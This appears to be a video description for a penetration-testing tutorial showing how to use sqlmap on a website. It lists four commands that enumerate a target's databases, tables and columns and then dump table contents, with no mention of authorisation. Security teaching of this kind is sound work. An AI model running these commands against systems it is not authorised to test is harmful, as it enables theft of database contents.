Howto: Check SQL Injection in Website
https://www.ispeech.org
► Leave a LIKE if you enjoy and want more.
► Subscribe for more! https://goo.gl/YdRW8n
► Twitter: http://twitter.com/freecst
► Facebook: http://www.facebook.com/freecst
Support this channel:
► Affordable VPS Hosting: https://goo.gl/UUTpKT
► Amazon: http://goo.gl/PZdbst
In this video I will show you step-by-step how to Check SQL Injection in Website using Sqlmap.
What Is Sqlmap:
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Steps:
Steps:
1. sqlmap -u URL/pagename --dbs
Get's Lists Databases on SQL Server.
2. sqlmap -u URL/pagename --tables -D Databasename
Get's Tables in the Database you pick.
3. sqlmap -u URL/pagename --columns -D Databasename -T Tablename
Get's Columns in the Table you pick.
4. sqlmap -u URL/pagename --dump -D Databasename -T Tablename
Extracts the Database information inside the Table you pick.
Looking for Ethical Hacking Books to start learning in hacking today.
http://www.freecst.com/store/buy-the-hacker-playbook-practical-guide-to-penetration-testing/
http://www.freecst.com/store/buy-hacker-playbook-2-practical-guide-penetration-testing
http://www.freecst.com/store/buy-the-red-team-field-manual-rtfm
2016-04-27 07:07:53
source
Gloss